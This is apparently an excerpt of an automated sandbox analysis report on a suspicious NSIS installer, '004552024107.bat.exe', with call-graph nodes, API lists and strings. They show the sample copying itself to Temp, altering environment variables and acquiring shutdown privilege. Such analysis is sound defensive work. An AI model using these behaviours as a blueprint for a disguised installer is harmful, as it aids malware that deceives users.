5350->5351 5352 4021c0 5351->5352 5353 402c5e 21 API calls 5352->5353 5354 4021ca 5353->5354 5355 40220c CoCreateInstance 5354->5355 5356 402c5e 21 API calls 5354->5356 5359 40222b 5355->5359 5361 4022d9 5355->5361 5356->5355 5357 401423 28 API calls 5358 40230f 5357->5358 5360 4022b9 MultiByteToWideChar 5359->5360 5359->5361 5360->5361 5361->5357 5361->5358 4743 40269a 4744 402c3c 21 API calls 4743->4744 4749 4026a4 4744->4749 4745 402712 4746 405e98 ReadFile 4746->4749 4747 402714 4752 4061eb wsprintfA 4747->4752 4748 402724 4748->4745 4751 40273a SetFilePointer 4748->4751 4749->4745 4749->4746 4749->4747 4749->4748 4751->4745 4752->4745 5362 40239a 5363 4023a1 5362->5363 5366 4023b4 5362->5366 5364 406320 21 API calls 5363->5364 5365 4023ae 5364->5365 5365->5366 5367 4059a3 MessageBoxIndirectA 5365->5367 5367->5366 5368 402a1b 5369 402a22 5368->5369 5370 402a6e 5368->5370 5373 402c3c 21 API calls 5369->5373 5374 402a6c 5369->5374 5371 4066b5 5 API calls 5370->5371 5372 402a75 5371->5372 5375 402c5e 21 API calls 5372->5375 5376 402a30 5373->5376 5377 402a7e 5375->5377 5378 402c3c 21 API calls 5376->5378 5377->5374 5386 4062e0 5377->5386 5380 402a3f 5378->5380 5385 4061eb wsprintfA 5380->5385 5382 402a8c 5382->5374 5390 4062ca 5382->5390 5385->5374 5387 4062eb 5386->5387 5388 40630e IIDFromString 5387->5388 5389 406307 5387->5389 5388->5382 5389->5382 5393 4062af WideCharToMultiByte 5390->5393 5392 402aad CoTaskMemFree 5392->5374 5393->5392 5394 6c60103d 5397 6c60101b 5394->5397 5398 6c60154b GlobalFree 5397->5398 5399 6c601020 5398->5399 5400 6c601024 5399->5400 5401 6c601027 GlobalAlloc 5399->5401 5402 6c601572 3 API calls 5400->5402 5401->5400 5403 6c60103b 5402->5403 5404 40149d 5405 4023b4 5404->5405 5406 4014ab PostQuitMessage 5404->5406 5406->5405 5407 401f1e 5408 402c5e 21 API calls 5407->5408 5409 401f24 5408->5409 5410 402c5e 21 API calls 5409->5410 5411 401f2d 5410->5411 5412 402c5e 21 API calls 5411->5412 5413 401f36 5412->5413 5414 402c5e 21 API calls 5413->5414 5415 401f3f 5414->5415 5416 401423 28 API calls 5415->5416 5417 401f46 5416->5417 5424 405969 ShellExecuteExA 5417->5424 5419 401f81 5420 40672a 5 API calls 5419->5420 5421 4027ed 5419->5421 5422 401f9b CloseHandle 5420->5422 5422->5421 5424->5419 4773 401fa0 4774 402c5e 21 API calls 4773->4774 4775 401fa6 4774->4775 4776 4053d1 28 API calls 4775->4776 4777 401fb0 4776->4777 4778 405926 2 API calls 4777->4778 4779 401fb6 4778->4779 4780 401fd7 CloseHandle 4779->4780 4783 4027ed 4779->4783 4788 40672a WaitForSingleObject 4779->4788 4780->4783 4784 401fcb 4785 401fd0 4784->4785 4786 401fd9 4784->4786 4793 4061eb wsprintfA 4785->4793 4786->4780 4789 406744 4788->4789 4790 406756 GetExitCodeProcess 4789->4790 4791 4066f1 2 API calls 4789->4791 4790->4784 4792 40674b WaitForSingleObject 4791->4792 4792->4789 4793->4780 5425 6c601000 5426 6c60101b 5 API calls 5425->5426 5427 6c601019 5426->5427 5428 402020 5429 402c5e 21 API calls 5428->5429 5430 402027 5429->5430 5431 4066b5 5 API calls 5430->5431 5432 402036 5431->5432 5433 4020be 5432->5433 5434 40204e GlobalAlloc 5432->5434 5434->5433 5435 402062 5434->5435 5436 4066b5 5 API calls 5435->5436 5437 402069 5436->5437 5438 4066b5 5 API calls 5437->5438 5439 402073 5438->5439 5439->5433 5443 4061eb wsprintfA 5439->5443 5441 4020ae 5444 4061eb wsprintfA 5441->5444 5443->5441 5444->5433 5445 6c602680 5446 6c6012f6 2 API calls 5445->5446 5448 6c602594 5446->5448 5447 6c6026a7 GlobalFree 5448->5447 5449 6c6025f3 lstrcpynA 5448->5449 5450 6c602604 StringFromGUID2 WideCharToMultiByte 5448->5450 5451 6c602628 WideCharToMultiByte 5448->5451 5452 6c602649 wsprintfA 5448->5452 5453 6c60266d GlobalFree 5448->5453 5449->5448 5450->5448 5451->5448 5452->5448 5453->5448 5454 401922 5455 401959 5454->5455 5456 402c5e 21 API calls 5455->5456 5457 40195e 5456->5457 5458 405a4f 71 API calls 5457->5458 5459 401967 5458->5459 4794 4024a3 4795 402c5e 21 API calls 4794->4795 4796 4024b5 4795->4796 4797 402c5e 21 API calls 4796->4797 4798 4024bf 4797->4798 4811 402cee 4798->4811 4801 402aea 4802 4024f4 4804 402500 4802->4804 4806 402c3c 21 API calls 4802->4806 4803 402c5e 21 API calls 4805 4024ed lstrlenA 4803->4805 4807 402522 RegSetValueExA 4804->4807 4808 403168 35 API calls 4804->4808 4805->4802 4806->4804 4809 402538 RegCloseKey 4807->4809 4808->4807 4809->4801 4812 402d09 4811->4812 4815 406141 4812->4815 4816 406150 4815->4816 4817 4024cf 4816->4817 4818 40615b RegCreateKeyExA 4816->4818 4817->4801 4817->4802 4817->4803 4818->4817 5460 401d23 5461 402c3c 21 API calls 5460->5461 5462 401d29 IsWindow 5461->5462 5463 401a33 5462->5463 5464 401925 5465 402c5e 21 API calls 5464->5465 5466 40192c 5465->5466 5467 4059a3 MessageBoxIndirectA 5466->5467 5468 401935 5467->5468 5469 4027a5 5470 4027ab 5469->5470 5471 4027af FindNextFileA 5470->5471 5473 4027c1 5470->5473 5472 402800 5471->5472 5471->5473 5475 40628d lstrcpynA 5472->5475 5475->5473 5476 6c602688 5477 6c60268c 5476->5477 5480 6c602594 5476->5480 5478 6c601361 lstrcpyA 5477->5478 5478->5480 5479 6c6026a7 GlobalFree 5480->5479 5481 6c6025f3 lstrcpynA 5480->5481 5482 6c602604 StringFromGUID2 WideCharToMultiByte 5480->5482 5483 6c602628 WideCharToMultiByte 5480->5483 5484 6c602649 wsprintfA 5480->5484 5485 6c60266d GlobalFree 5480->5485 5481->5480 5482->5480 5483->5480 5484->5480 5485->5480 4834 401bac 4835 401bb9 4834->4835 4836 401bfd 4834->4836 4837 401c41 4835->4837 4842 401bd0 4835->4842 4838 401c01 4836->4838 4839 401c26 GlobalAlloc 4836->4839 4840 406320 21 API calls 4837->4840 4852 4023b4 4837->4852 4838->4852 4855 40628d lstrcpynA 4838->4855 4841 406320 21 API calls 4839->4841 4846 4023ae 4840->4846 4841->4837 4853 40628d lstrcpynA 4842->4853 4845 401c13 GlobalFree 4845->4852 4848 4059a3 MessageBoxIndirectA 4846->4848 4846->4852 4847 401bdf 4854 40628d lstrcpynA 4847->4854 4848->4852 4850 401bee 4856 40628d lstrcpynA 4850->4856 4853->4847 4854->4850 4855->4845 4856->4852 5486 4029af 5487 402c3c 21 API calls 5486->5487 5488 4029b5 5487->5488 5489 4027ed 5488->5489 5490 406320 21 API calls 5488->5490 5490->5489 5491 402631 5492 402c5e 21 API calls 5491->5492 5493 402638 5492->5493 5496 405e20 GetFileAttributesA CreateFileA 5493->5496 5495 402644 5496->5495 5497 404d32 GetDlgItem GetDlgItem 5498 404d88 7 API calls 5497->5498 5502 404faf 5497->5502 5499 404e30 DeleteObject 5498->5499 5500 404e24 SendMessageA 5498->5500 5501 404e3b 5499->5501 5500->5499 5503 404e72 5501->5503 5506 406320 21 API calls 5501->5506 5518 405091 5502->5518 5531 40501e 5502->5531 5551 404c80 SendMessageA 5502->5551 5504 40432d 22 API calls 5503->5504 5508 404e86 5504->5508 5505 40513d 5510 405147 SendMessageA 5505->5510 5511 40514f 5505->5511 5507 404e54 SendMessageA SendMessageA 5506->5507 5507->5501 5514 40432d 22 API calls 5508->5514 5509 404fa2 5512 404394 8 API calls 5509->5512 5510->5511 5519 405161 ImageList_Destroy 5511->5519 5520 405168 5511->5520 5527 405178 5511->5527 5517 40533e 5512->5517 5532 404e97 5514->5532 5515 4050ea SendMessageA 5515->5509 5522 4050ff SendMessageA 5515->5522 5516 405083 SendMessageA 5516->5518 5518->5505 5518->5509 5518->5515 5519->5520 5523 405171 GlobalFree 5520->5523 5520->5527 5521 4052f2 5521->5509 5528 405304 ShowWindow GetDlgItem ShowWindow 5521->5528 5525 405112 5522->5525 5523->5527 5524 404f71 GetWindowLongA SetWindowLongA 5526 404f8a 5524->5526 5536 405123 SendMessageA 5525->5536 5529 404fa7 5526->5529 5530 404f8f ShowWindow 5526->5530 5527->5521 5544 4051b3 5527->5544 5556 404d00 5527->5556 5528->5509 5550 404362 SendMessageA 5529->5550 5549 404362 SendMessageA 5530->5549 5531->5516 5531->5518 5532->5524 5535 404ee9 SendMessageA 5532->5535 5537 404f6c 5532->5537 5538 404f27 SendMessageA 5532->5538 5539 404f3b SendMessageA 5532->5539 5535->5532 5536->5505 5537->5524 5537->5526 5538->5532 5539->5532 5541 4052bd 5542 4052c8 InvalidateRect 5541->5542 5545 4052d4 5541->5545 5542->5545 5543 4051e1 SendMessageA 5547 4051f7 5543->5547 5544->5543 5544->5547 5545->5521 5565 404c3b 5545->5565 5546 40526b SendMessageA SendMessageA 5546->5547 5547->5541 5547->5546 5549->5509 5550->5502 5552 404ca3 GetMessagePos ScreenToClient SendMessageA 5551->5552 5553 404cdf SendMessageA 5551->5553 5554 404cd7 5552->5554 5555 404cdc 5552->5555 5553->5554 5554->5531 5555->5553 5568 40628d lstrcpynA 5556->5568 5558 404d13 5569 4061eb wsprintfA 5558->5569 5560 404d1d 5561 40140b 2 API calls 5560->5561 5562 404d26 5561->5562 5570 40628d lstrcpynA 5562->5570 5564 404d2d 5564->5544 5571 404b76 5565->5571 5567 404c50 5567->5521 5568->5558 5569->5560 5570->5564 5572 404b8c 5571->5572 5573 406320 21 API calls 5572->5573 5574 404bf0 5573->5574 5575 406320 21 API calls 5574->5575 5576 404bfb 5575->5576 5577 406320 21 API calls 5576->5577 5578 404c11 lstrlenA wsprintfA SetDlgItemTextA 5577->5578 5578->5567 4857 403e33 4858 403e4b 4857->4858 4859 403fac 4857->4859 4858->4859 4860 403e57 4858->4860 4861 403ffd 4859->4861 4862 403fbd GetDlgItem GetDlgItem 4859->4862 4865 403e62 SetWindowPos 4860->4865 4866 403e75 4860->4866 4864 404057 4861->4864 4874 401389 2 API calls 4861->4874 4863 40432d 22 API calls 4862->4863 4867 403fe7 SetClassLongA 4863->4867 4868 404379 SendMessageA 4864->4868 4922 403fa7 4864->4922 4865->4866 4869 403ec0 4866->4869 4870 403e7e ShowWindow 4866->4870 4871 40140b 2 API calls 4867->4871 4919 404069 4868->4919 4872 403ec8 DestroyWindow 4869->4872 4873 403edf 4869->4873 4875 403f99 4870->4875 4876 403e9e GetWindowLongA 4870->4876 4871->4861 4882 4042b6 4872->4882 4878 403ee4 SetWindowLongA 4873->4878 4879 403ef5 4873->4879 4880 40402f 4874->4880 4881 404394 8 API calls 4875->4881 4876->4875 4877 403eb7 ShowWindow 4876->4877 4877->4869 4878->4922 4879->4875 4884 403f01 GetDlgItem 4879->4884 4880->4864 4885 404033 SendMessageA 4880->4885 4881->4922 4887 4042e7 ShowWindow 4882->4887 4882->4922 4883 4042b8 DestroyWindow EndDialog 4883->4882 4888 403f12 SendMessageA IsWindowEnabled 4884->4888 4889 403f2f 4884->4889 4885->4922 4886 40140b 2 API calls 4886->4919 4887->4922 4888->4889 4888->4922 4891 403f3c 4889->4891 4894 403f83 SendMessageA 4889->4894 4895 403f4f 4889->4895 4901 403f34 4889->4901 4890 406320 21 API calls 4890->4919 4891->4894 4891->4901 4892 404306 SendMessageA 4896 403f6a 4892->4896 4893 40432d 22 API calls 4893->4919 4894->4875 4897 403f57 4895->4897 4898 403f6c 4895->4898 4896->4875 4899 40140b 2 API calls 4897->4899 4900 40140b 2 API calls 4898->4900 4899->4901 4902 403f73 4900->4902 4901->4892 4902->4875 4902->4901 4903 40432d 22 API calls 4904 4040e4 GetDlgItem 4903->4904 4905 404101 ShowWindow KiUserCallbackDispatcher 4904->4905 4906 4040f9 4904->4906 4930 40434f KiUserCallbackDispatcher 4905->4930 4906->4905 4908 40412b EnableWindow 4913 40413f 4908->4913 4909 404144 GetSystemMenu EnableMenuItem SendMessageA 4910 404174 SendMessageA 4909->4910 4909->4913 4910->4913 4912 403e14 22 API calls 4912->4913 4913->4909 4913->4912 4931 404362 SendMessageA 4913->4931 4932 40628d lstrcpynA 4913->4932 4915 4041a3 lstrlenA 4916 406320 21 API calls 4915->4916 4917 4041b4 SetWindowTextA 4916->4917 4918 401389 2 API calls 4917->4918 4918->4919 4919->4883 4919->4886 4919->4890 4919->4893 4919->4903 4920 4041f8 DestroyWindow 4919->4920 4919->4922 4920->4882 4921 404212 CreateDialogParamA 4920->4921 4921->4882 4923 404245 4921->4923 4924 40432d 22 API calls 4923->4924 4925 404250 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4924->4925 4926 401389 2 API calls 4925->4926 4927 404296 4926->4927 4927->4922 4928 40429e ShowWindow 4927->4928 4929 404379 SendMessageA 4928->4929 4929->4882 4930->4908 4931->4913 4932->4915 4933 4025b5 4934 402c9e 21 API calls 4933->4934 4935 4025bf 4934->4935 4936 402c3c 21 API calls 4935->4936 4937 4025c8 4936->4937 4938 4025d6 4937->4938 4943 4027ed 4937->4943 4939 4025e3 RegEnumKeyA 4938->4939 4940 4025ef RegEnumValueA 4938->4940 4941 40260b RegCloseKey 4939->4941 4940->4941 4942 402604 4940->4942 4941->4943 4942->4941 5579 4014b7 5580 4014bd 5579->5580 5581 401389 2 API calls 5580->5581 5582 4014c5 5581->5582 5583 4053be CallWindowProcA 5584 4053cb 5583->5584 5585 4047bf 5586 4047eb 5585->5586 5587 4047fc 5585->5587 5646 405987 GetDlgItemTextA 5586->5646 5589 404808 GetDlgItem 5587->5589 5591 404867 5587->5591 5590 40481c 5589->5590 5595 404830 SetWindowTextA 5590->5595 5598 405cb8 4 API calls 5590->5598 5592 40494b 5591->5592 5600 406320 21 API calls 5591->5600 5644 404af5 5591->5644 5592->5644 5648 405987 GetDlgItemTextA 5592->5648 5593 4047f6 5594 406587 5 API calls 5593->5594 5594->5587 5599 40432d 22 API calls 5595->5599 5597 404394 8 API calls 5602 404b09 5597->5602 5603 404826 5598->5603 5604 40484c 5599->5604 5605 4048db SHBrowseForFolderA 5600->5605 5601 40497b 5606 405d0d 18 API calls 5601->5606 5603->5595 5610 405c1f 3 API calls 5603->5610 5607 40432d 22 API calls 5604->5607 5605->5592 5608 4048f3 CoTaskMemFree 5605->5608 5609 404981 5606->5609 5611 40485a 5607->5611 5612 405c1f 3 API calls 5608->5612 5649 40628d lstrcpynA 5609->5649 5610->5595 5647 404362 SendMessageA 5611->5647 5614 404900 5612->5614 5617 404937 SetDlgItemTextA 5614->5617 5621 406320 21 API calls 5614->5621 5616 404860 5619 4066b5 5 API calls 5616->5619 5617->5592 5618 404998 5620 4066b5 5 API calls 5618->5620 5619->5591 5627 40499f 5620->5627 5622 40491f lstrcmpiA 5621->5622 5622->5617 5624 404930 lstrcatA 5622->5624 5623 4049db 5650 40628d lstrcpynA 5623->5650 5624->5617 5626 4049e2 5628 405cb8 4 API calls 5626->5628 5627->5623 5632 405c66 2 API calls 5627->5632 5633 404a33 5627->5633 5629 4049e8 GetDiskFreeSpaceA 5628->5629 5631 404a0c MulDiv 5629->5631 5629->5633 5631->5633 5632->5627 5634 404aa4 5633->5634 5636 404c3b 24 API calls 5633->5636 5635 404ac7 5634->5635 5637 40140b 2 API calls 5634->5637 5651 40434f KiUserCallbackDispatcher 5635->5651 5638 404a91 5636->5638 5637->5635 5640 404aa6 SetDlgItemTextA 5638->5640 5641 404a96 5638->5641 5640->5634 5642 404b76 24 API calls 5641->5642 5642->5634 5643 404ae3 5643->5644 5645 404718 SendMessageA 5643->5645 5644->5597 5645->5644 5646->5593 5647->5616 5648->5601 5649->5618 5650->5626 5651->5643

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 4033d8-403428 SetErrorMode GetVersionExA 1 403469 0->1 2 40342a-403444 GetVersionExA 0->2 3 403470 1->3 2->3 4 403446-403465 2->4 5 403472-40347d 3->5 6 403494-40349b 3->6 4->1 7 403490 5->7 8 40347f-40348e 5->8 9 4034a5-4034e5 6->9 10 40349d 6->10 7->6 8->6 11 4034e7-4034ef call 4066b5 9->11 12 4034f8 9->12 10->9 11->12 18 4034f1 11->18 14 4034fd-403511 call 406647 lstrlenA 12->14 19 403513-40352f call 4066b5 * 3 14->19 18->12 26 403540-4035a0 #17 OleInitialize SHGetFileInfoA call 40628d GetCommandLineA call 40628d 19->26 27 403531-403537 19->27 34 4035a2-4035a6 26->34 35 4035ab-4035be call 405c4a CharNextA 26->35 27->26 31 403539 27->31 31->26 34->35 38 40367f-403683 35->38 39 4035c3-4035c6 38->39 40 403689 38->40 41 4035c8-4035cc 39->41 42 4035ce-4035d5 39->42 43 40369d-4036b7 GetTempPathA call 4033a7 40->43 41->41 41->42 44 4035d7-4035d8 42->44 45 4035dc-4035df 42->45 53 4036b9-4036d7 GetWindowsDirectoryA lstrcatA call 4033a7 43->53 54 40370f-403727 DeleteFileA call 402f31 43->54 44->45 47 403670-40367c call 405c4a 45->47 48 4035e5-4035e9 45->48 47->38 66 40367e 47->66 51 403601-40362e 48->51 52 4035eb-4035f1 48->52 59 403640-40366e 51->59 60 403630-403636 51->60 57 4035f3-4035f5 52->57 58 4035f7 52->58 53->54 68 4036d9-403709 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4033a7 53->68 69 4037ba-4037cb call 4039bc OleUninitialize 54->69 70 40372d-403733 54->70 57->51 57->58 58->51 59->47 65 40368b-403698 call 40628d 59->65 62 403638-40363a 60->62 63 40363c 60->63 62->59 62->63 63->59 65->43 66->38 68->54 68->69 82 4037d1-4037e0 call 4059a3 ExitProcess 69->82 83 403928-40392e 69->83 73 403735-403740 call 405c4a 70->73 74 4037ab-4037b2 call 403a96 70->74 86 403742-40376b 73->86 87 403776-40377f 73->87 80 4037b7 74->80 80->69 84 403930-403945 GetCurrentProcess OpenProcessToken 83->84 85 4039a6-4039ae 83->85 91 403976-403984 call 4066b5 84->91 92 403947-403970 LookupPrivilegeValueA AdjustTokenPrivileges 84->92 89 4039b0 85->89 90 4039b3-4039b6 ExitProcess 85->90 93 40376d-40376f 86->93 94 403781-40378f call 405d0d 87->94 95 4037e6-40380a call 40590e lstrlenA call 40628d 87->95 89->90 106 403992-40399d ExitWindowsEx 91->106 107 403986-403990 91->107 92->91 93->87 100 403771-403774 93->100 94->69 104 403791-4037a7 call 40628d * 2 94->104 114 40381b-403830 95->114 115 40380c-403816 call 40628d 95->115 100->87 100->93 104->74 106->85 109 40399f-4039a1 call 40140b 106->109 107->106 107->109 109->85 118 403835 114->118 115->114 120 403839-403865 wsprintfA call 406320 118->120 123 403867-40386c call 405897 120->123 124 40386e call 4058f1 120->124 127 403873-403875 123->127 124->127 129 403877-403881 GetFileAttributesA 127->129 130 4038af-4038ce SetCurrentDirectoryA call 406066 CopyFileA 127->130 131 4038a0-4038a8 129->131 132 403883-40388c DeleteFileA 129->132 130->69 138 4038d4-4038f5 call 406066 call 406320 call 405926 130->138 131->118 135 4038aa 131->135 132->131 134 40388e-40389e call 405a4f 132->134 134->120 134->131 135->69 146 4038f7-4038ff 138->146 147 403918-403923 CloseHandle 138->147 146->69 148 403905-40390d call 406620 146->148 147->69 148->120 151 403913 148->151 151->69
                                        APIs
                                        • SetErrorMode.KERNELBASE(00008001), ref: 004033FB
                                        • GetVersionExA.KERNEL32(?), ref: 00403424
                                        • GetVersionExA.KERNEL32(0000009C), ref: 0040343B
                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403504
                                        • #17.COMCTL32(?,00000008,0000000A,0000000C), ref: 00403541
                                        • OleInitialize.OLE32(00000000), ref: 00403548
                                        • SHGetFileInfoA.SHELL32(00429448,00000000,?,00000160,00000000,?,00000008,0000000A,0000000C), ref: 00403566
                                        • GetCommandLineA.KERNEL32(Haftaras12 Setup,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040357B
                                        • CharNextA.USER32(00000000,"C:\Users\user\Desktop\004552024107.bat.exe",00000020,"C:\Users\user\Desktop\004552024107.bat.exe",00000000,?,00000008,0000000A,0000000C), ref: 004035B5
                                        • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000008,0000000A,0000000C), ref: 004036AE
                                        • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C), ref: 004036BF
                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C), ref: 004036CB
                                        • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C), ref: 004036DF
                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C), ref: 004036E7
                                        • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C), ref: 004036F8
                                        • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C), ref: 00403700
                                        • DeleteFileA.KERNELBASE(1033,?,00000008,0000000A,0000000C), ref: 00403714
                                        • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C), ref: 004037BF
                                        • ExitProcess.KERNEL32 ref: 004037E0
                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\004552024107.bat.exe",00000000,?,?,00000008,0000000A,0000000C), ref: 004037EF
                                        • wsprintfA.USER32 ref: 00403846
                                        • GetFileAttributesA.KERNEL32(00431400,C:\Users\user\AppData\Local\Temp\,00431400,?,0000000C), ref: 00403878
                                        • DeleteFileA.KERNEL32(00431400), ref: 00403884
                                        • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00431400,?,0000000C), ref: 004038B0
                                        • CopyFileA.KERNEL32(C:\Users\user\Desktop\004552024107.bat.exe,00431400,?), ref: 004038C6
                                        • CloseHandle.KERNEL32(00000000,00431800,00431800,?,00431400,00000000), ref: 00403919
                                        • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C), ref: 00403936
                                        • OpenProcessToken.ADVAPI32(00000000), ref: 0040393D
                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403951
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403970
                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 00403995
                                        • ExitProcess.KERNEL32 ref: 004039B6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: File$Process$Exit$CurrentDeleteDirectoryEnvironmentPathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCloseCommandCopyErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuewsprintf
                                        • String ID: "$"C:\Users\user\Desktop\004552024107.bat.exe"$1033$A$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Storfyrstindes$C:\Users\user\Desktop$C:\Users\user\Desktop\004552024107.bat.exe$Error launching installer$Haftaras12 Setup$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`K|u$~nsu%X.tmp
                                        • API String ID: 2956269667-1475839666
                                        • Opcode ID: 7d50073d3b4601cb2fc23eb0cc30a51c03b07205e862937f6a4874c8b30ec542
                                        • Instruction ID: 7f7404e7af7d96985e5cf9c88e74da5f08b6bc5144b1890d42f960bb7a69135c
                                        • Opcode Fuzzy Hash: 7d50073d3b4601cb2fc23eb0cc30a51c03b07205e862937f6a4874c8b30ec542
                                        • Instruction Fuzzy Hash: E2F11570904254AADB21AF758D49BAF7EB8AF45706F0440BFF441B62D2CB7C4A45CB2E

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 152 40550f-40552b 153 405531-4055f8 GetDlgItem * 3 call 404362 call 404c53 GetClientRect GetSystemMetrics SendMessageA * 2 152->153 154 4056ba-4056c0 152->154 175 405616-405619 153->175 176 4055fa-405614 SendMessageA * 2 153->176 156 4056c2-4056e4 GetDlgItem CreateThread FindCloseChangeNotification 154->156 157 4056ea-4056f6 154->157 156->157 159 405718-40571e 157->159 160 4056f8-4056fe 157->160 164 405720-405726 159->164 165 405773-405776 159->165 162 405700-405713 ShowWindow * 2 call 404362 160->162 163 405739-405740 call 404394 160->163 162->159 172 405745-405749 163->172 170 405728-405734 call 404306 164->170 171 40574c-40575c ShowWindow 164->171 165->163 168 405778-40577e 165->168 168->163 177 405780-405793 SendMessageA 168->177 170->163 173 40576c-40576e call 404306 171->173 174 40575e-405767 call 4053d1 171->174 173->165 174->173 181 405629-405640 call 40432d 175->181 182 40561b-405627 SendMessageA 175->182 176->175 183 405890-405892 177->183 184 405799-4057c5 CreatePopupMenu call 406320 AppendMenuA 177->184 191 405642-405656 ShowWindow 181->191 192 405676-405697 GetDlgItem SendMessageA 181->192 182->181 183->172 189 4057c7-4057d7 GetWindowRect 184->189 190 4057da-4057f0 TrackPopupMenu 184->190 189->190 190->183 194 4057f6-405810 190->194 195 405665 191->195 196 405658-405663 ShowWindow 191->196 192->183 193 40569d-4056b5 SendMessageA * 2 192->193 193->183 197 405815-405830 SendMessageA 194->197 198 40566b-405671 call 404362 195->198 196->198 197->197 199 405832-405852 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 197->199 198->192 201 405854-405874 SendMessageA 199->201 201->201 202 405876-40588a GlobalUnlock SetClipboardData CloseClipboard 201->202 202->183
                                        APIs
                                        • GetDlgItem.USER32(?,00000403), ref: 0040556E
                                        • GetDlgItem.USER32(?,000003EE), ref: 0040557D
                                        • GetClientRect.USER32(?,?), ref: 004055BA
                                        • GetSystemMetrics.USER32(00000002), ref: 004055C1
                                        • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004055E2
                                        • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004055F3
                                        • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405606
                                        • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405614
                                        • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405627
                                        • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405649
                                        • ShowWindow.USER32(?,00000008), ref: 0040565D
                                        • GetDlgItem.USER32(?,000003EC), ref: 0040567E
                                        • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040568E
                                        • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004056A7
                                        • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004056B3
                                        • GetDlgItem.USER32(?,000003F8), ref: 0040558C
                                          • Part of subcall function 00404362: SendMessageA.USER32(00000028,?,?,00404192), ref: 00404370
                                        • GetDlgItem.USER32(?,000003EC), ref: 004056CF
                                        • CreateThread.KERNELBASE(00000000,00000000,Function_000054A3,00000000), ref: 004056DD
                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004056E4
                                        • ShowWindow.USER32(00000000), ref: 00405707
                                        • ShowWindow.USER32(?,00000008), ref: 0040570E
                                        • ShowWindow.USER32(00000008), ref: 00405754
                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405788
                                        • CreatePopupMenu.USER32 ref: 00405799
                                        • AppendMenuA.USER32(00000000,00000000,?,00000000), ref: 004057AE
                                        • GetWindowRect.USER32(?,000000FF), ref: 004057CE
                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004057E7
                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405823
                                        • OpenClipboard.USER32(00000000), ref: 00405833
                                        • EmptyClipboard.USER32 ref: 00405839
                                        • GlobalAlloc.KERNEL32(00000042,?), ref: 00405842
                                        • GlobalLock.KERNEL32(00000000), ref: 0040584C
                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405860
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405879
                                        • SetClipboardData.USER32(?,00000000), ref: 00405884
                                        • CloseClipboard.USER32 ref: 0040588A
                                        Memory Dump Source
